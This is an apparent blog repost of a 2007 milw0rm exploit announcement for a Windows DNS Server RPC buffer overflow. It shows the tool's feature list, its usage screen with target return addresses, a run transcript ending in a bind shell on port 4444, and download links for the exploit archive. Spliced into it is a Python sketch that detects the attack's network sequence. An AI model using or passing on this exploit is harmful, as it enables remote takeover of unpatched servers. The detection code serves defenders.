2007/04/19  MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2

    Copyright notice: when reposting, please indicate the original source, the author information and this notice in the form of a hyperlink:
    http://www.blogbus.com/h4ck3r-logs/5084258.html

    Source: milw0rm

    Exploit v2 features:
    - Target Remote port 445 (by default but requires auth)
    - Manual target for dynamic tcp port (without auth)
    - Automatic search for dynamic dns rpc port
    - Local and remote OS fingerprinting (auto target)
    - Windows 2000 server and Windows 2003 server (Spanish) supported by default
    - Fixed bug with Windows 2003 Shellcode
    - Universal local exploit for Win2k (automatic search for opcodes)
    - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
    - Added targets for remote Win2k English and Italian (not tested, found with the Metasploit opcode database; please report your own)
    - Microsoft RPC api used ( who cares? :p )

    D:\Programación\DNSTEST>dnstest
    --------------------------------------------------------------
    Microsoft Dns Server local & remote RPC Exploit code
    Exploit code by Andres Tarasco & Mario Ballano
    Tested against Windows 2000 server SP4 and Windows 2003 SP2
    --------------------------------------------------------------

    Usage: dnstest -h 127.0.0.1 (Universal local exploit)
    dnstest -h host [-t id] [-p port]
    Targets:
    0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
    1 (0x79467ef8) - Win2k server SP4 Spanish - (default for win2k )
    2 (0x7c4fedbb) - Win2k server SP4 English
    3 (0x7963edbb) - Win2k server SP4 Italian
    4 (0x41414141) - Windows all Denial of Service

    D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2
    --------------------------------------------------------------
    Microsoft Dns Server local & remote RPC Exploit code
    Exploit code by Andres Tarasco & Mario Ballano
    Tested against Windows 2000 server SP4 and Windows 2003 SP2
    --------------------------------------------------------------

    [+] Trying to fingerprint target.. (05.02)
    [+] Remote Host identified as Windows 2003
    [-] No port selected. Trying Ninja sk1llz
    [+] Binding to ncacn_ip_tcp: 192.168.1.2
    [+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
    [+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
    [+] Dynamic DNS rpc port found (1105)
    [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
    [+] RpcBindingFromStringBinding success
    [+] Sending Exploit code to DnssrvOperation()
    [+] Now try to connect to port 4444
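    The transcript above exposes a network sequence that a defender can look for: an endpoint-mapper lookup (TCP 135) for the DNS Server RPC interface 50abc2a4-574d-40b3-9d66-ee4fd5fba076, a bind to the dynamic port the mapper returned (1105 here), and then a connection to the bind shell on TCP 4444. The following detection sketch is an added example, not code from the exploit or its authors: it correlates connection records per (source, destination) pair and flags that three-step chain. The record format, the sample records, the 60-second window and the 1025-5000 dynamic port range are assumptions made for this example.

```python
"""Correlate connection records into the epm -> dynamic RPC port -> 4444 chain.

All input here is constructed for the example; the format is
"<ISO timestamp> <src> -> <dst>:<dport>", one connection per line.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Iterable, List, Tuple

EPM_PORT = 135                           # RPC endpoint mapper
BIND_SHELL_PORT = 4444                   # listener named in the tool's transcript
DYNAMIC_RPC_RANGE = range(1025, 5001)    # assumed default dynamic range (Win2k/2k3)
WINDOW = timedelta(seconds=60)           # assumed correlation window


@dataclass(frozen=True)
class Conn:
    ts: datetime
    src: str
    dst: str
    dport: int


def parse_conn(line: str) -> Conn:
    """Parse one constructed record such as
    '2007-04-19T10:00:02 192.168.1.50 -> 192.168.1.2:135'."""
    ts, src, _arrow, dst_port = line.split()
    dst, port = dst_port.rsplit(":", 1)
    return Conn(datetime.fromisoformat(ts), src, dst, int(port))


def find_exploit_chains(conns: Iterable[Conn],
                        window: timedelta = WINDOW) -> List[Tuple[str, str, int]]:
    """Return (src, dst, dynamic_port) for every source/destination pair that
    performs: epm lookup (135) -> bind to a dynamic port -> connection to 4444,
    each step within `window` of the previous one."""
    by_pair = {}
    for c in sorted(conns, key=lambda c: c.ts):
        by_pair.setdefault((c.src, c.dst), []).append(c)

    zero = timedelta(0)
    hits = []
    for (src, dst), seq in by_pair.items():
        epm_times = [c.ts for c in seq if c.dport == EPM_PORT]
        binds = [c for c in seq
                 if c.dport in DYNAMIC_RPC_RANGE and c.dport != BIND_SHELL_PORT]
        for bind in binds:
            # Step 1 -> 2: the dynamic-port bind must follow an epm lookup.
            if not any(zero <= (bind.ts - t) <= window for t in epm_times):
                continue
            # Step 2 -> 3: a connection to the bind shell must follow the bind.
            # A legitimate DNS management session does steps 1 and 2 as well,
            # so only the third step turns the pair into an alert.
            shell = [c for c in seq
                     if c.dport == BIND_SHELL_PORT
                     and zero < (c.ts - bind.ts) <= window]
            if shell:
                hits.append((src, dst, bind.dport))
                break
    return hits


def detect(log_text: str) -> List[Tuple[str, str, int]]:
    conns = [parse_conn(l) for l in log_text.splitlines() if l.strip()]
    return find_exploit_chains(conns)


# Constructed sample: host .50 reproduces the transcript's sequence (SMB
# fingerprint on 445, epm lookup, bind to 1105, shell on 4444); host .77 is a
# legitimate admin session (epm + bind only); host .80 is plain DNS traffic.
SAMPLE_LOG = """\
2007-04-19T10:00:01 192.168.1.50 -> 192.168.1.2:445
2007-04-19T10:00:02 192.168.1.50 -> 192.168.1.2:135
2007-04-19T10:00:03 192.168.1.50 -> 192.168.1.2:1105
2007-04-19T10:00:06 192.168.1.50 -> 192.168.1.2:4444
2007-04-19T10:05:00 192.168.1.77 -> 192.168.1.2:135
2007-04-19T10:05:01 192.168.1.77 -> 192.168.1.2:1105
2007-04-19T11:00:00 192.168.1.80 -> 192.168.1.2:53
"""

if __name__ == "__main__":
    for src, dst, port in detect(SAMPLE_LOG):
        print(f"ALERT {src} -> {dst}: DNS RPC bind on {port} followed by {BIND_SHELL_PORT}")
```

    The epm lookup plus dynamic-port bind alone is exactly what the DNS management console does, so the rule keys on the follow-up connection to the listener; a variant of the tool that uses a different port or a reverse connection would need the third step adjusted, and the 445 fingerprint step in the transcript is deliberately not required, since SMB traffic to a domain server is routine.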

    also available at

    http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
    http://www.48bits.com/exploits/dnsxpl.v2.1.zip
    http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip